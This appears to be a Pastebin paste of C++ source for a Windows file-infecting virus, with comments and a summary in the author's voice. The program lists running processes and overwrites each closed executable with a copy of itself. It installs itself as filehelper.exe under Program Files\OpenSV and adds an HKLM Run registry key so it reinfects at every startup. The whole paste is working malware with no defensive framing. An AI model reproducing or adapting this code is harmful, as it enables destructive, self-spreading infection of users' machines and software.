Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <iostream>
- #include <windows.h>
- #include <Tlhelp32.h>
- #include <string>
- #include <fstream>
- #include <direct.h>
- std::string startupStr;
- std::string winDirStr;
- HKEY hKey;
- bool accessed = false;
- void RegSet() { //Just add %:\Program Files\OpenSV\filehelper.exe to startup
- char startup[MAX_PATH] = "";
- strcat(startup, startupStr.c_str());
- HKEY hKey;
- RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
- RegSetValueEx(hKey, "File info", 0, REG_SZ,(const unsigned char*)startup, sizeof(startup));
- RegCloseKey(hKey);
- }
- int TargetList() {
- HMODULE GetModH = GetModuleHandle(NULL);
- char self[MAX_PATH]; // }___Create char self and then apply the THIS .exe's path and name to it.
- GetModuleFileName(GetModH, self, sizeof(self));// }
- std::ifstream TarListIn;
- std::ifstream exeCheck;
- std::string targetPath;
- TarListIn.open(winDirStr.c_str(), std::ios::in);
- exeCheck.open(startupStr.c_str(), std::ios::in | std::ios::binary);
- std::getline (TarListIn, targetPath);
- //std::cout << "\"" << path << "\"" << std::endl;
- //std::cin.get();
- if(TarListIn.is_open() && exeCheck.is_open()) { //If files.txt AND filehelper.exe (.exe list and infection .exe) exist, continue.
- while(!TarListIn.eof()) { //While we havent reached the end of the list, do..... *.eof also advances the current line being read in the txt file.
- if(accessed) { //If GenerateList declares files.txt as being accessed, hold off for 100 ms (to avoid high cpu usage) and then re-run TargetList
- Sleep(100);
- TargetList();
- return 0; //We dont want it to run twice+, do we?
- }
- std::getline (TarListIn, targetPath); //Each running .exe's path is put in its own line. Read the current line, and....
- CopyFile(self, targetPath.c_str(), false); //...copy it from self (current running infection file) to targetPath, overwriting it.
- Sleep(50); //Why not?
- //DeleteFile(path.c_str());
- }
- TarListIn.close(); //Close files.txt
- } else { //NOW, if either files.txt OR filehelper.exe were not found, lets RECOPY THEM =D
- CopyFile(self, startupStr.c_str(), false);
- RegSet(); //Add %:\Program Files\OpenSV\filehelper.exe to startup, for "startup rinsing"
- Sleep(100); //A good 100ms never hurts
- }
- }
- DWORD WINAPI GenerateList(LPVOID) {
- while(true) {
- std::ofstream TarListOut;
- std::string filePath;
- PROCESSENTRY32 sEntry;
- MODULEENTRY32 mEntry;
- HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //Gets snapshot of running processes
- HANDLE ModSnap;
- std::string path;
- sEntry.dwSize = sizeof(PROCESSENTRY32);
- mEntry.dwSize = sizeof(MODULEENTRY32);
- ModSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, sEntry.th32ProcessID);
- Module32First(ModSnap, &mEntry);
- RegSet();
- accessed = true; //TargetList() checks this value, when true (.txt being written to) it will not try to read from the file
- TarListOut.open(winDirStr.c_str(), std::ios::out);
- while(Process32Next(snapshot, &sEntry)){ //One by one, add the path of the .exe to the text file, and proceed to the next running .exe
- ModSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, sEntry.th32ProcessID); //Assigns snapshot to ModSnap
- Module32Next(ModSnap, &mEntry); //Move to next item in list
- filePath = mEntry.szExePath; //Put .exe into file path
- if(filePath.find("\\") < MAX_PATH) { //Most system .exe's lack the full path, only displaying .exe name. We cant overwrite these easily anyway, so...
- TarListOut << filePath << std::endl; //Writes [path].exe to TarListOut, which is files.txt ...we filter out names that lack a "\"
- }
- }
- TarListOut.close(); //Close .txt file
- accessed = false; //Allow TargetList() to continue reading from the .txt file
- Sleep(10000);
- }
- }
- void config() {
- startupStr = _getdrive() + 0x40; //Find windows install drive, set it to startupStr
- startupStr = startupStr + ":\\Program Files\\OpenSV\\"; //Add infection "install" directory to the drive letter
- if(GetFileAttributes(startupStr.c_str()) == INVALID_FILE_ATTRIBUTES) //If non-existent,
- CreateDirectory(startupStr.c_str(), NULL); // create the directory
- winDirStr = startupStr + "files.txt"; //.txt file listing running .exes
- startupStr += "filehelper.exe"; //Ran at startup for easy rinsing, central location that is less likely to be found or deleted.
- //MessageBox(NULL, startupStr.c_str(), winDirStr.c_str(), MB_OK);
- RegSet();
- }
- //Summary
- /*While GenerateList is fetching a list of running .exe's every ten seconds, TargetList attempts to overwrite each .exe found, repeating every one second.
- At first nothing will happen, a running .exe cannot be overwritten. When that .exe is closed, the "rinse and repeat" cycle "rinses" each non-running
- .exe, by overwriting it. Next time the user runs that program, it is merely a duplicate of the infection, and will spread further. A copy of the infection
- located in %:\Program Files\OpenSV\ starts on startup, with the list of previosly-running .exes remaining in a .txt file. At a fresh start, most of the programs
- in that list wont be running, so the infection will spread to many programs at that point. It is also recopied and re-entered to the registry every time any
- instance of the infection is run. Even after successful removal, the infection can start all over if the user forgot to disinfect a single .exe somewhere, and runs it.*/
- int main() {
- config(); //initialize the infection
- CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&GenerateList, 0, 0, NULL); //Begin running .exe finding. Refreshes list every 10 seconds.
- while(true) {
- TargetList(); //Overwrite all exe's found with GenerateList thread. "rinse and repeat"
- Sleep(1000); //1 second(s)
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
